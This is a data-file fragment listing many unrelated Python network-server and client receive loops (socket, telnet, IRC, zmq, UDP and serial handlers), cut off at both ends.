method(request)\n if result is not None:\n self._send_response(result, peer)\n except KeyError as exc:\n self._logger.error(\n \"missing parameter for command '%s': '%s'\",\n command, exc.args[0]\n )\n except ValueError:\n self._logger.error(\"invalid control request received\")\n except KeyError:\n self._logger.error(\"no control command specified\")\n except AttributeError:\n self._logger.error(\"unknown control command '%s'\", command)\n return []", "def listen(self):\n self.logger.info(\"Control server: {}\".format(self.server_bind_addr))\n while True:\n try:\n msg = self.ctrl_sock.recv_json()\n reply = self.handle_msg(msg)\n self.logger.debug(\"Sending: {}\".format(reply))\n self.ctrl_sock.send_json(reply)\n except JSONDecodeError:\n err_msg = \"Not a JSON message!\"\n self.logger.warning(err_msg)\n self.ctrl_sock.send_json(msgs.error(err_msg))\n except KeyboardInterrupt:\n self.logger.info(\"Exiting control server. Bye!\")\n self.clean_up()\n sys.exit(0)", "def run(self):\n patterns = self.conn.dispatch_patterns()\n\n while not self.disconnect.is_set():\n try:\n data = self.conn.get_data() # returns empty string if times out\n if data:\n self.conn.dispatch_data(data, patterns)\n\n command = self.command_queue.get_nowait()\n self.process_command(command)\n except DisconnectedException:\n self.logger.info('Disconnected from server. Reconnecting.')\n self.conn.close()\n self.connect_and_join_channels(self.channels)\n continue\n except Queue.Empty:\n continue", "def enter_read_loop(self):\n\n try:\n while True:\n try:\n request = DAPBaseMessage.recv(self._current_client)\n except Exception as e:\n # TODO send error\n traceback.print_exc()\n continue\n\n if request is None:\n # client terminated without termination request\n return\n try:\n self.resolve_message(request)\n except Exception as e:\n # TODO send error\n traceback.print_exc()\n self.next_seq += 1\n DAPErrorResponse.create(self.next_seq, rq.seq, False, message=\"Error\").send(self._current_client)\n continue\n\n if self._current_client is None:\n self._ready_for_events = False\n return # terminated\n\n except BaseException as e:\n # failure while communicating\n traceback.print_exc()\n pass\n finally:\n # final handler, clear active client\n self._current_client = None\n self._ready_for_events = False\n\n debugger.reset()", "def run(self):\n os.chdir(ServerFolder)\n while True:\n request = self.client_socket.recv(1024).decode().strip()\n if not request:\n print(\"Disconnecting from client {}:{}\".format(\n self.client_ip, self.client_port))\n self.client_socket.shutdown(socket.SHUT_RDWR)\n self.client_socket.close()\n break\n request = request.split(\",\")\n\n if request[0] == \"LS\":\n self.ls()\n elif request[0] == \"PWD\":\n self.pwd()\n elif request[0] == \"CD\":\n self.cd(request[1])\n elif request[0] == \"MKDIR\":\n self.mkdir(request[1])\n elif request[0] == \"RMDIR\":\n self.rmdir(request[1])\n elif request[0] == \"RM\":\n self.rm(request[1])\n\n elif request[0] == \"rget\" and len(request[1:]) == 1:\n self.send_file(*request[1:])\n\n elif request[0] == \"rput\" and len(request[1:]) == 2:\n self.receive_file(*request[1:])", "def start(self) -> None:\n data = b\"\"\n while True:\n # while loop to get size of receiving data\n while len(data) < self.payload_size:\n packet = self.client_socket.recv(4 * 1024) # 4KB\n if not packet:\n break\n data += packet\n # counting size of sending data\n packed_msg_size = data[: self.payload_size]\n # if in first while loop there was download part of data, need to add it on start\n data = data[self.payload_size :]\n msg_size = struct.unpack(\"Q\", packed_msg_size)[0]\n # receiving concrete data\n while len(data) < msg_size:\n data += self.client_socket.recv(4 * 1024)\n # getting all data for current state\n data_recv_pickled = data[:msg_size]\n # setting data to whats left for next state\n data = data[msg_size:]\n # unpickle what we got\n data_recv = pickle.loads(data_recv_pickled)\n # show image and if q pressed - stop\n cv2.imshow(\"RECEIVING VIDEO\", data_recv.frame)\n print(\n f\"[CLIENT] GOT IMAGE AT TIME: {data_recv.decision} | WITH PERCENTAGE: {data_recv.percentage}% | DELAY: {datetime.datetime.now() - data_recv.time_sended}\"\n )\n key = cv2.waitKey(1) & 0xFF\n if key == ord(\"q\"):\n break\n # disconnect from server\n self.disconnect()", "def run(self):\n inputs = [self.server]\n\n while self.running:\n print '1'\n try:\n readable, writeable, exceptional = \\\n select.select(inputs, [], [])\n except select.error, e:\n print 'select:error[%s]' % e.message\n break\n\n for sock in readable:\n print '2'\n if sock == self.server:\n client, address = self.server.accept()\n client.setblocking(0)\n inputs.append(client)\n # self.outputs.append(client)\n\n print 'Client[%s] connected!' % address[0]\n self.clients[client] = address[0]\n\n else:\n print '3'\n self.recv_data(sock)", "def listen_to_connection(self, conn):\n with conn:\n print(\"Connected\")\n while self.running:\n data = conn.recv(32)\n if not data: \n return\n \n print(\"Recived Data:\"+str(data))\n self.__update(data)", "def __async_read_callback(self, data, err) -> None:\n if err != 0:\n logging.info('async_read (1): disconnected')\n self.close()\n elif not data:\n logging.info('async_read (2): disconnected')\n self.close()\n elif self.__is_active:\n # Push incoming data through Telnet Option Parser.\n self.receive_buffer.clear()\n for byte in data:\n # Add parsed text data\n return_byte = self.__telnet_parser.iac_sniffer(bytes([byte]))\n if return_byte is not None:\n # logging.info('byte received: {byte}'.format(byte=return_byte))\n # bytes_parsed = bytes_parsed + return_byte\n self.receive_buffer.append(return_byte)\n\n # Data other than Telnet Options, then send back to client. or push through system!!\n if len(self.receive_buffer) > 0:\n # This should now be pushed through for\n # Input on the STATE instead of echoed back!\n logging.info(\"Echo %s\", self.receive_buffer)\n self.async_write(b''.join(self.receive_buffer))\n\n # Ready for next set of incoming data\n self.wait_for_async_data()", "def handle(self):\n global latest_status\n data = self.request[0]\n socket = self.request[1]\n logging.info(\"Received {} bytes from {}\".format(len(data), self.client_address[0]))\n jss = interface.joystick_status_pb2.JoystickStatus()\n jss.ParseFromString(data)\n sent = jss.sent.ToDatetime()\n if not latest_status:\n latest_status = jss\n else:\n if latest_status.sent.ToDatetime() < sent:\n latest_status = jss\n else:\n logging.warning(\"Discarded stray package.\")\n ack = interface.joystick_status_pb2.JoystickAck()\n ack.sent.CopyFrom(jss.sent)\n ack.received.GetCurrentTime()\n response = ack.SerializeToString()\n socket.sendto(response, self.client_address)", "def run(self):\n\n print('Listening for client connections...')\n\n while not self.shutdownEvent.is_set():\n readyToRead, readyToWrite, inputError = select.select(self._socketList, [], [], self._selectTimeout)\n\n # Iterate over input sockets\n for sock in readyToRead:\n # Received new connection request\n if sock is self._serverSocket:\n print('Received connection request. Establishing connection with client.')\n\n # Accept the connection and append it to the socket list\n clientSocket, address = self._serverSocket.accept()\n\n #TODO: Add this if there's a timeout blocking issue, or make the sockets non-blocking\n #clientSocket.settimeout(0.5)\n\n self._socketListMutex.acquire()\n\n try:\n self._socketList.append(clientSocket)\n finally:\n self._socketListMutex.release()\n # Received message from client\n else:\n # Read a message off of the socket\n msgData = MessageHandler.recvMsg(sock)\n\n # Process the message\n if msgData is not None:\n self.__processMsg(sock, msgData)\n # The client disconnected\n else:\n print('Client disconnected')\n\n self._socketListMutex.acquire()\n\n try:\n self._socketList.remove(sock)\n finally:\n self._socketListMutex.release()\n\n sock.close()\n\n # Cleanup\n self.__shutdown()", "def listen(self):\n\n\t\twhile self.running:\n\t\t\t#Wait for server to inform you there is data\n\t\t\tself.rxEvt.wait()\n\t\t\t\n\t\t\ttry:\n\t\t\t\t#See if recieved packet is actually latest from client\n\t\t\t\tif self.rxData[len(self.rxData)-1][0] >= self.rxLatest:\n\n\t\t\t\t\t#Update latest and pass data to data handler\n\t\t\t\t\tself.rxLatest = self.rxData[len(self.rxData)-1][0]\n\t\t\t\t\tself.handleRecvData(self.rxData[len(self.rxData)-1][1])\n\t\t\n\t\t\t\t\t#Clear event object so other clientHandlers begin waiting again\n\t\t\t\t\tself.rxEvt.clear()\n\n\t\t\texcept IndexError, e:\n\t\t\t\tprint(\"Index error on ServerClient listen\\nCarrying on Regardless\")", "def run(self):\n to_client_request_thread = threading.Thread(target=self._dispatch_to_client_request, daemon=True)\n to_client_request_thread.start()\n\n from_client_request_thread = threading.Thread(target=self._dispatch_from_client_request, daemon=True)\n from_client_request_thread.start()\n\n from_client_commands_thread = threading.Thread(target=self._from_client_commands, daemon=True)\n from_client_commands_thread.start()\n\n to_client_update_state_thread = threading.Thread(target=self._to_client_update_state, daemon=True)\n to_client_update_state_thread.start()\n\n server_control_thread = threading.Thread(target=self._server_control, daemon=True)\n server_control_thread.start()\n\n # Wait for threads to finish\n to_client_request_thread.join()\n from_client_request_thread.join()\n from_client_commands_thread.join()\n to_client_update_state_thread.join()\n server_control_thread.join()\n \n # Close server connection\n self._to_client_request.close()\n self._from_client_request.close()", "def data_received(self, data):\n # This may seem strange; feeding all bytes received to the **writer**,\n # and, only if they test positive, duplicating to the **reader**.\n #\n # The writer receives a copy of all raw bytes because, as an IAC\n # interpreter, it may likely **write** a responding reply.\n self._last_received = datetime.datetime.now()\n\n cmd_received = False\n for byte in data:\n try:\n recv_inband = self.writer.feed_byte(bytes([byte]))\n except:\n self._log_exception(logger.warning, *sys.exc_info())\n else:\n if recv_inband:\n # forward to reader (shell).\n self.reader.feed_data(bytes([byte]))\n\n # becomes True if any out of band data is received.\n cmd_received = cmd_received or not recv_inband\n\n # until negotiation is complete, re-check negotiation aggressively\n # upon receipt of any command byte.\n if not self._waiter_connected.done() and cmd_received:\n self._check_negotiation_timer()", "def runner(socket,id):\n socket.send('proceed')\n \n while True:\n data = socket.recv()\n print(\"id(\",id,\")=\",data)\n if not data: break\n \n elif data == \"info\":\n run_time = time.ctime(start_time)\n statusMessage = \"SERVER STATUS: Running...\\nInterface id:\"+str(id)+\"\\nBeen running since: \"+str(run_time)+\"\\n\"\n socket.send(statusMessage)\n \n elif data == \"plug\": #talk to plugin? aka. other commands \n pass\n \n else: #not valid command.\n socket.send(\"invalid command\")\n \n socket.close() \n print(\"closed connection\") #means the thread is also quitting", "def start(self):\n\t\twhile True:\n\t\t\tmensaje_servidor = \">>SERVIDOR:\"\n\t\t\tself.s.listen()\n\t\t\tprint(mensaje_servidor + \"ESPERANDO POR CLIENTES CTRL-C PARA TERMINAR EJECUCIÓN\")\n\t\t\tself.CONEXION, direccion = self.s.accept()\n\t\t\tprint(mensaje_servidor + \"CONEXIÓN RECIBIDA DE \" + str(direccion))\n\t\t\twhile True:\n\t\t\t\tmensaje_cliente = self.recibir_mensaje()\n\t\t\t\tif mensaje_cliente.startswith(\"download\"):\n\t\t\t\t\tself.enviar_mensaje(self.hacer_lista())\n\t\t\t\t\tnombre_archivo = self.recibir_mensaje().split(\":\")[1]\n\t\t\t\t\tself.enviar_archivo(nombre_archivo)\n\t\t\t\telif mensaje_cliente.startswith(\"load\"):\n\t\t\t\t\tnombre_archivo = mensaje_cliente.split(\":\")[1]\n\t\t\t\t\tself.recibir_archivo(nombre_archivo)\n\t\t\t\telif mensaje_cliente.startswith(\"list:\"):\n\t\t\t\t\tself.enviar_mensaje(self.hacer_lista())\n\t\t\t\telif mensaje_cliente == \"stop\":\n\t\t\t\t\tbreak", "def handleClient(self, connection, address):\r\n # time.sleep(5) #server Action\r\n while True:\r\n try:\r\n data = connection.recv(1024).decode(\"utf-8\")\r\n except:\r\n print('client disconnect: ', address, 'at', self.now())\r\n data = \"\"\r\n\r\n if not data: break\r\n\r\n data = self.change_host(data, address)\r\n result = self.manag_bd.dispatcher(data)\r\n\r\n mutex = thread.allocate_lock()\r\n\r\n\r\n if type(result)==type(list()):\r\n mutex.acquire() #Lock interrupt\r\n l = len(result)\r\n reply = str(l)\r\n connection.send(reply.encode(\"utf-8\"))\r\n for line in result:\r\n time.sleep(0.0025)\r\n reply = line\r\n connection.send(reply.encode(\"utf-8\"))\r\n mutex.release()# permission to interrupt\r\n else:\r\n reply = str(self.now())\r\n connection.send(reply.encode(\"utf-8\"))\r\n\r\n\r\n\r\n connection.close()", "def _listen(self):\n if not self.is_connected:\n self.connect()\n\n while True:\n data = self.recv()\n ping = PING_RE.match(data)\n if ping:\n self.handle_ping(ping.group(1))\n else:\n result = self.handle_message(data)\n\n if result:\n print(result)\n\n time.sleep(1)", "def run(self):\n self.debug(__name__ + \".run(): self.threadName=\" + str(self.threadName) + \"\\n\")\n self.debug(__name__ + \".run(): self.statusFile=\" + str(self.statusFile) + \"\\n\")\n self.debug(__name__ + \".run(): self.recvData=\" + str(self.recvData) + \"\\n\")\n self.debug(__name__ + \".run(): self.socketConn=\" + str(self.socketConn) + \"\\n\")\n\n status = True\n data = self.getFileData()\n self.mySocketObj.serverSend(self.socketConn, data)\n if self.socketConn: self.socketConn.close()\n # self.updateCounts()\n self.status = status\n if status:\n self.appendMsg(__name__ + \".run(): Completed successfully for \" + str(self.threadName) + \"\\n\")\n else:\n self.appendMsg(__name__ + \".run(): Failed for \" + str(self.threadName) + \"\\n\")\n # Endif", "def run(self):\n\n print(\"Running server on address: {}, port: {}\".format(self.ip_address, self.port))\n self.setup_for_run()\n\n try:\n read_list = [self.server]\n select_timeout = 1\n while True:\n # receive a connection request from client and get conn, addrr tuple\n readable, _, _= select.select(read_list, [], [], select_timeout)\n if self.server in readable:\n conn, addr = self.server.accept()\n # log connnection confirmation message\n print(addr[0] + \" connected\")\n # start a new client thread with the new conn and address, and create new struct\n self.addr_to_conn_struct_map[addr] = ConnStruct(conn, self.start_new_thread(conn, addr))\n # process msgs in queue\n self.process_queue()\n\n except KeyboardInterrupt:\n pass\n finally:\n self.shutting_down.set()\n # clean up all known client connections and threads\n for addr in self.addr_to_conn_struct_map:\n self.clean(addr, keep=True)\n print(\"Exiting Server Process, waiting for clients cleanup\")\n # wait for client threads to get the message and clean their sht\n time.sleep(1)\n # close server connection\n self.server.close()\n print(\"Done!\")", "def run_server(self):\n print('Starting socket server (host {}, port {})'.format(self.host, self.port))\n\n client_sock, client_addr = self.sock.accept()\n\n print('Client {} connected'.format(client_addr))\n\n stop = False\n while not stop:\n if client_sock:\n # Check if the client is still connected and if data is available:\n try:\n rdy_read, rdy_write, sock_err = select.select([client_sock,], [], [])\n except select.error:\n print('Select() failed on socket with {}'.format(client_addr))\n return 1\n\n if len(rdy_read) > 0:\n read_data = client_sock.recv(255)\n # Check if socket has been closed\n if len(read_data) == 0:\n print('{} closed the socket.'.format(client_addr))\n stop = False # True\n client_sock, client_addr = self.sock.accept()\n print(\"New connection opened\")\n else:\n print('>>> Received: {}'.format(read_data.rstrip()))\n if read_data.rstrip() == 'quit':\n stop = False #True\n else:\n if read_data == 'right':\n self.moveRight(0.5)\n elif read_data == 'left':\n self.moveLeft(0.5)\n elif read_data == 'forward':\n self.moveForward(0.5)\n self.setGPIO(0,0,0,0,.01)\n client_sock.send(read_data)\n else:\n print(\"No client is connected, SocketServer can't receive data\")\n #stop = True\n time.delay(1)\n client_sock, client_addr = self.sock.accept()\n print(\"New connection opened\")\n\n # Close socket\n print('Closing connection with {}'.format(client_addr))\n client_sock.close()\n return 0", "def run_server(self):\n self.establish_connection()\n while True:\n self.receive_data(self.conn)", "def cmd_handler():\n context = zmq.Context()\n\n # socket to receive commands (a subscription to ELECTION_CODE channel)\n cmd_socket = context.socket(zmq.SUB)\n cmd_socket.connect (\"tcp://%s:5556\" % SERVER_HOST)\n topicfilter = \"politiche2013\"\n cmd_socket.setsockopt(zmq.SUBSCRIBE, topicfilter)\n\n # socket to send replies\n reply_sender = context.socket(zmq.PUSH)\n reply_sender.connect(\"tcp://%s:5557\" % SERVER_HOST)\n\n # main loop\n while True:\n print \"Aye sir, unit {0} ready for your commands ...\".format(computer_id)\n # wait for a command\n string = cmd_socket.recv()\n\n # action\n print \"Message received: '%s'\" % (string,)\n\n # send reply to server\n print \"Sending reply to server\"\n reply = { 'unit' : computer_id, 'status' : 'configured'}\n reply_sender.send_json(reply)", "def run(self):\n print(\"Client: Started\", flush=True)\n ack = Packet()\n ack_data = b''\n\n request = \"download\"\n req_pkt = Packet(0, request)\n req_packed = req_pkt.pkt_pack()\n\n self.client_socket.sendto(req_packed, self.server_addr)\n\n ack_data = self.client_socket.recv(self.pkt_size)\n ack.pkt_unpack(ack_data)\n\n self.recv_img(self.img_save_to)\n\n ack = Packet()\n ack_data = b''\n request = \"upload\"\n req_pkt = Packet(0, request)\n req_packed = req_pkt.pkt_pack()\n\n self.client_socket.sendto(req_packed, self.server_addr)\n\n ack_data = self.client_socket.recv(self.pkt_size)\n ack.pkt_unpack(ack_data)\n\n self.send_img(self.img_to_send)\n\n sleep(5)\n\n ack = Packet()\n ack_data = b''\n request = \"exit\"\n req_pkt = Packet(0, request)\n req_packed = req_pkt.pkt_pack()\n\n self.client_socket.sendto(req_packed, self.server_addr)\n\n ack_data = self.client_socket.recv(self.pkt_size)\n ack.pkt_unpack(ack_data)\n\n print(\"Client: Exiting...\")\n # close socket when finished\n self.client_socket.close()", "def run(self):\n self.cncLock.acquire()\n self.running = True\n\n # Initialize\n try:\n self.cnc = serial.Serial(self.deviceFile,BAUD_RATE)\n\n self.updaterThread = threading.Thread(target=self.periodic_timer)\n self.updaterThread.start()\n\n # Wake up grbl\n log.info(\"Initializing Grbl...\")\n cmd = \"\\r\\n\\r\\n\"\n self.cnc.write(cmd.encode())\n\n # Wait for grbl to initialize and flush startup text in serial input\n time.sleep(2)\n self.cnc.flushInput()\n self.cncLock.release()\n\n while self.running :\n cmd = self.commandQueue.get().strip() + EOLStr\n if self.running == False:\n break\n self.cncLock.acquire()\n self.cnc.write(cmd.encode())\n\n out = str(self.cnc.readline().strip()) # Wait for grbl response\n if out.find('ok') >= 0 :\n log.debug(f'MSG: {out}') # Debug response\n elif out.find('error') >= 0 :\n log.error(f'ERROR: {out}')\n else:\n log.info(out)\n self.cncLock.release()\n except:\n raise\n finally:\n log.debug(\"CNC main loop left\")\n self.cnc.close()", "def dataReceived(self,data):\n if DEBUG: print \"class CommandProtocol, function dataReceived\"\n if data[6:12] == \"status\":\n print self.server.xstatus()\n self.transport.write(\"<XML>\"+self.server.xstatus()+\"</XML>\")\n self.transport.loseConnection()\n return\n if DEBUG and len(data) < 10000: print \"data:\", data\n # on receipt of the first fragment determine message length, extract header info\n # NOTE: this can only handle header lengths smaller than the fragment size - \n # the header MUST arrive in the first fragment\n # append the new data \n self.alldata += data\n if u\"?console\" in data: self.provide_console()\n #requests = 0 #For use with priorities\n if not hasattr(self,'mlength'):\n # attempt to extract the header info with the current message subset\n try: \n self.dataHTTP = HTTPRequest(self.alldata)\n self.boundary = self.dataHTTP.headers['content-type'].split('boundary=')[-1]\n fb = data.find('--' + self.boundary) # find the first used boundary string\n if fb == -1:\n return # if there is none, the header must not be complete\n # if there is a boundary, header must be complete; get header data\n self.mlength = fb + int(self.dataHTTP.headers.dict['content-length'])\n headerItemsforCommand = ['host','origin','referer']\n self.request = {k: self.dataHTTP.headers[k] for k in headerItemsforCommand if k in self.dataHTTP.headers}\n self.request.update({'ctime':self.ctime,'protocol':self})\n # record where this request is coming from\n self.factory.connection_manager.elaborateLog(self,self.request)\n except: return # if unsuccessful, wait for next packet and try again\n \n # if we made it to here, the header has been received\n # if the entirety of message not yet received, append this fragment and continue\n if self.mlength > len(self.alldata):\n return\n # if we have made it here, this is last fragment of message \n # mark the 'all data received' time\n self.request.update({'timereceived':time.time()})\n # strip multipart data from incoming HTTP request\n kv = [datas.split('name=\"')[-1].split('\"\\n\\r\\n\\r') for datas in self.alldata.split('--'+self.boundary+'--')]\n self.params = {k:v.rstrip() for k,v in kv[:-1]}\n # insert request, if valid, into command queue (persistently resides in self.Factory) \n #pdb.set_trace()\n #SC=SocketCommand(self.params,self.request)\n SC=commands.SocketCommand(self.params,self.request, self.server.command_library)#CP 2014-10-28\n try:\n self.factory.connection_manager.server.command_queue.add(SC)\n #self.factory.commandQueue.add(SC)\n except AttributeError:\n if DEBUG: print 'Failed to insert SocketCommand in Queue, No Queue'\n raise\n #self.factory.commandQueue=CommandQueue(SC)\n except:\n if DEBUG: print \"Error No command included in request\", SC\n msg = {'Not_Command_text_message':'Failed to insert SocketCommand in Queue, reason unknown','terminator':'die'}\n self.transport.write(simplejson.dumps(msg, ensure_ascii = False).encode('utf8'))\n if DEBUG: print 'Failed to insert SocketCommand in Queue, reason unknown'\n self.transport.loseConnection()\n raise", "def datagram_received(self, data: bytes, addr: AddressType):\n try:\n hdr = PacketHeader.deserialize(data)\n payload = data[hdr.LENGTH :]\n except ValueError:\n # Nothing we can do, packet cannot be decoded.\n return\n\n # Filter replies\n if hdr.is_reply:\n return\n\n # Check for an RST.\n if hdr.flags & PacketFlags.RST:\n # Disconnect active client.\n if addr in self._clients:\n self.disconnect_client(addr, False)\n return\n\n # Non RST, continuation of previous session or new connection.\n cid = hdr.client_id.value\n\n # New connection.\n if not cid:\n if addr in self._clients:\n # Delete stale connection for the same network address.\n self.disconnect_client(addr, False)\n\n skel = self._skel_fac(addr)\n # Generate random CID to avoid collisions with previously connected clients.\n cid = random.randint(u32.min() + 1, u32.max())\n self._clients[addr] = cid, ConnectedClient(\n caddr=addr,\n skel=skel,\n transport=self._transport,\n timeout_callback=self.disconnect_client,\n inactivity_timeout=self._inactivity_timeout,\n result_cache_timeout=self._result_cache_timeout,\n )\n\n # Register and send new CID\n rep = PacketHeader(\n client_id=u32(cid), flags=(PacketFlags.REPLY | PacketFlags.CHANGE_CID)\n )\n self._transport.sendto(rep.serialize(), addr)\n return\n\n # Existing connection\n if addr not in self._clients:\n # Unknown client\n # Client thinks it's using an open connection but server\n # has no record of that connection. Reset to signal that.\n self._send_rst(addr)\n return\n\n scid, cclient = self._clients[addr]\n if scid != cid:\n # Unknown client, also one that thinks it's using an open connection\n # but server also doesn't have a record of that connection. Reset.\n # todo: need to notify servers of shutdown!\n self.disconnect_client(addr)\n return\n\n cclient.process(hdr, payload)", "def handle_client(self, conn):\r\n\r\n while True:\r\n # Receive message\r\n msg = conn.recv(1024).decode()\r\n res = self.validateCommand(msg)\r\n\r\n print(res)\r\n\r\n # Send response\r\n conn.sendall(res.encode())\r\n\r\n if msg == '/exit':\r\n break\r\n\r\n # Close client connection\r\n print('Client disconnected...')\r\n conn.close()", "def run(self): #CHANGED FROM run to start\n\n # Open socket for communication\n self.udpSock.bind(self.addr)\n # Receive communication until stopped\n while not self.close.isSet():\n data = self.udpSock.recv(self.buffer)\n self.lock.acquire()\n self.processData(data)\n self.lock.release()\n\n\n # Close socket\n self.udpSock.close()", "def run(self):\n while True:\n try:\n data = self._read()\n except IOError:\n break\n\n if len(data) == 0:\n self.finalize(\"Connection closed.\")\n break\n\n gevent.spawn(self.process_data, data)", "def run(self):\n while True:\n try:\n data = self._read()\n except IOError:\n break\n\n if len(data) == 0:\n self.finalize(\"Connection closed.\")\n break\n\n gevent.spawn(self.process_data, data)", "def start(self):\n self.build_client_snapshot()\n self.load_local_dir_state()\n\n # Operations necessary to start the daemon\n self.create_observer()\n self.observer.start()\n self.sync_with_server()\n\n self.listener_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self.listener_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n self.listener_socket.bind((self.cfg['cmd_address'], self.cfg['cmd_port']))\n self.listener_socket.listen(self.cfg['backlog_listener_sock'])\n r_list = [self.listener_socket]\n self.daemon_state = 'started'\n self.running = 1\n polling_counter = 0\n try:\n while self.running:\n r_ready, w_ready, e_ready = select.select(r_list, [], [], self.cfg['timeout_listener_sock'])\n\n for s in r_ready:\n\n if s == self.listener_socket:\n # handle the server socket\n client_socket, client_address = self.listener_socket.accept()\n r_list.append(client_socket)\n else:\n # handle all other sockets\n length = s.recv(Daemon.INT_SIZE)\n if length:\n # i need to do [0] and cast int because the struct.unpack return a tupla like (23234234,)\n # with the length as a string\n length = int(struct.unpack('!i', length)[0])\n message = json.loads(s.recv(length))\n for cmd, data in message.items():\n if cmd == 'shutdown':\n raise KeyboardInterrupt\n self.conn_mng.dispatch_request(cmd, data)\n else:\n s.close()\n r_list.remove(s)\n\n # synchronization polling\n # makes the polling every 3 seconds, so it waits six cycle (0.5 * 6 = 3 seconds)\n # maybe optimizable but now functional\n polling_counter += 1\n if polling_counter == 6:\n self.sync_with_server()\n polling_counter = 0\n\n except KeyboardInterrupt:\n self.stop(0)\n self.observer.stop()\n self.observer.join()\n self.listener_socket.close()", "async def loop(self):\n\t\twhile self.active:\n\t\t\ttry:\n\t\t\t\tawait self.process_data(await self.websocket.recv())\n\t\t\texcept exceptions.ClientError as e:\n\t\t\t\tawait self.send(0, str(e))\n\t\t\texcept KeyboardInterrupt:\n\t\t\t\tawait self.unregister()", "def run(self):\n #setsockopt() is used to specify options on the socket.\n #Here, we set the option SO_REUSEADDR, which indicates that the system can reuse this socket\n self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n\n try:\n #associate the socket with the server address and port\n self.sock.bind((self.host, self.port))\n\n except socket.error as e:\n print \"Bind Error : \", e\n\n #puts the socket into server mode, The number you give to listen()\n #specifies how many connections can be queued for this socket\n self.sock.listen(1)\n\n #print socket listening state\n print('Starting socket server (host {}, port {})'.format(self.host, self.port))\n\n #loop to wait for connection\n while True:\n\n #wait for connection\n print(\"Wating for connection ... \")\n\n try:\n #accept waits for an incoming connection, returning the open connection between\n #the server and client and the address of the client\n #The connection is actually a different socket on another port (assigned by the kernel)\n self.connection, self.client_address = self.sock.accept()\n #print client connected\n print('Client {} connected'.format(self.client_address))\n\n except Exception, e:\n\t\t\t\tprint \"sock closed! Error: \",e\n\n #if connection successful, enter second loop where data exchange is done\n while True:\n #receive data\n try:\n data = self.connection.recv(self.buf_size).decode('utf-8')\n #close if exeception\n except Exception, e:\n print \"error\", e\n\n #if not data, continue receiving data\n if not data:\n print('no data')\n break\n #split data by \">\" to get commands\n data_array = data.split(\">\")\n #act depending on command received\n for data_command in data_array:\n if data_command == \"\":\n continue\n\n #GO BACKWARDS\n if Commands.CMD_FORWARD[1:] in data_command:\n print data_command + \" at \" + datetime.datetime.now().strftime(\"%H:%M:%S\")\n #move forward\n self.c.forward()\n\n #GO FORWARD\n elif Commands.CMD_BACKWARD[1:] in data_command:\n print data_command + \" at \" + datetime.datetime.now().strftime(\"%H:%M:%S\")\n #set the direction in which motors will spin\n self.c.writeBlock(self.c.MOTOR_LEFT_DIR,1)\n self.c.writeBlock(self.c.MOTOR_RIGHT_DIR,1)\n #increase power (PWM) supplied to the motor\n for i in range(0,500,10):\n self.c.writeBlock(self.c.MOTOR_LEFT,i)\n self.c.writeBlock(self.c.MOTOR_RIGHT,i)\n time.sleep(0.005)\n\n #TURN RIGHT\n elif Commands.CMD_TURN_RIGHT[1:] in data_command:\n #log the info\n print data_command + \" \" + str(self.c.WHEELS_ORIENTATION) + \" at \" + datetime.datetime.now().strftime(\"%H:%M:%S\")\n #turn to the right the direction\n self.c.turn_right()\n #update the UI\n self.emit( SIGNAL('update_wheel_orientation_lcd(QString)'), str(self.c.WHEELS_ORIENTATION))\n\n #TURN LEFT\n elif Commands.CMD_TURN_LEFT[1:] in data_command:\n #log the info\n print data_command + \" \" + str(self.c.WHEELS_ORIENTATION) + \" at \" + datetime.datetime.now().strftime(\"%H:%M:%S\")\n #turn to the right the direction\n self.c.turn_left()\n #update the UI\n self.emit( SIGNAL('update_wheel_orientation_lcd(QString)'), str(self.c.WHEELS_ORIENTATION))\n\n #STOP\n elif Commands.CMD_STOP[1:] in data_command:\n\n #print command and timestamp\n print data_command + \" at \" + datetime.datetime.now().strftime(\"%H:%M:%S\")\n #stop\n self.c.stop()\n\n #ULTRASONIC TURN RIGHT\n elif Commands.CMD_ULTRASONIC_TURN_RIGHT[1:] in data_command:\n #log the info\n print data_command + \" \" + str(self.c.ULTRASONIC_ORIENTATION) + \" at \" + datetime.datetime.now().strftime(\"%H:%M:%S\")\n #turn to the right the direction\n self.c.ultrasonic_right()\n #update the UI\n self.emit( SIGNAL('update_ultrasonic_orientation_lcd(QString)'), str(self.c.ULTRASONIC_ORIENTATION))\n\n #ULTRASONIC TURN RIGHT\n elif Commands.CMD_ULTRASONIC_TURN_LEFT[1:] in data_command:\n #log the info\n print data_command + \" \" + str(self.c.ULTRASONIC_ORIENTATION) + \" at \" + datetime.datetime.now().strftime(\"%H:%M:%S\")\n #turn to the right the direction\n self.c.ultrasonic_left()\n #update the UI\n self.emit( SIGNAL('update_ultrasonic_orientation_lcd(QString)'), str(self.c.ULTRASONIC_ORIENTATION))\n\n #RED LED\n elif Commands.CMD_RGB_R[1:] in data_command:\n #print command and timestamp\n print data_command + \" at \" + datetime.datetime.now().strftime(\"%H:%M:%S\")\n #turn red led ON\n self.c.turn_red_led_on()\n #update server UI\n self.emit( SIGNAL('update_led_label(QString, QString)'), \"red\", \"background-color: red\")\n\n #GREEN LED\n elif Commands.CMD_RGB_G[1:] in data_command:\n #print command and timestamp\n print data_command + \" at \" + datetime.datetime.now().strftime(\"%H:%M:%S\")\n #turn green led ON\n self.c.turn_green_led_on()\n #update server UI\n self.emit( SIGNAL('update_led_label(QString, QString)'), \"green\" ,\"background-color: green\")\n\n #BLUE LED\n elif Commands.CMD_RGB_B[1:] in data_command:\n #print command and timestamp\n print data_command + \" at \" + datetime.datetime.now().strftime(\"%H:%M:%S\")\n #turn blue led ON\n self.c.turn_blue_led_on()\n #update server UI\n self.emit( SIGNAL('update_led_label(QString, QString)'), \"blue\" ,\"background-color: blue\")\n\n #OFF LED\n elif Commands.CMD_RGB_OFF[1:] in data_command:\n #print command and timestamp\n print data_command + \" at \" + datetime.datetime.now().strftime(\"%H:%M:%S\")\n #turn blue led ON\n self.c.turn_led_off()\n #update server UI\n self.emit( SIGNAL('update_led_label(QString, QString)'), \"off\", \"background-color: white\")\n self.connection.close()\n break", "async def data_received(self, data):\n prefix, command, args = parse_raw_irc_command(data)\n await self.command_handler.run(command, prefix, *args)", "def handle(self):\n global log_th\n sent = 1\n msg_body = ''\n get_recv = True\n get_data = True\n empty_check = 0\n # Looping session requests\n while 1:\n try:\n # If enabled sleep feauture\n if self.sleep_between != 0:\n time.sleep(self.sleep_between)\n # If no answer feauture\n if self.no_answer != 0:\n time.sleep(1)\n continue\n # Changing receive size if receiving data part\n if sent == 3 or sent == 4:\n data = 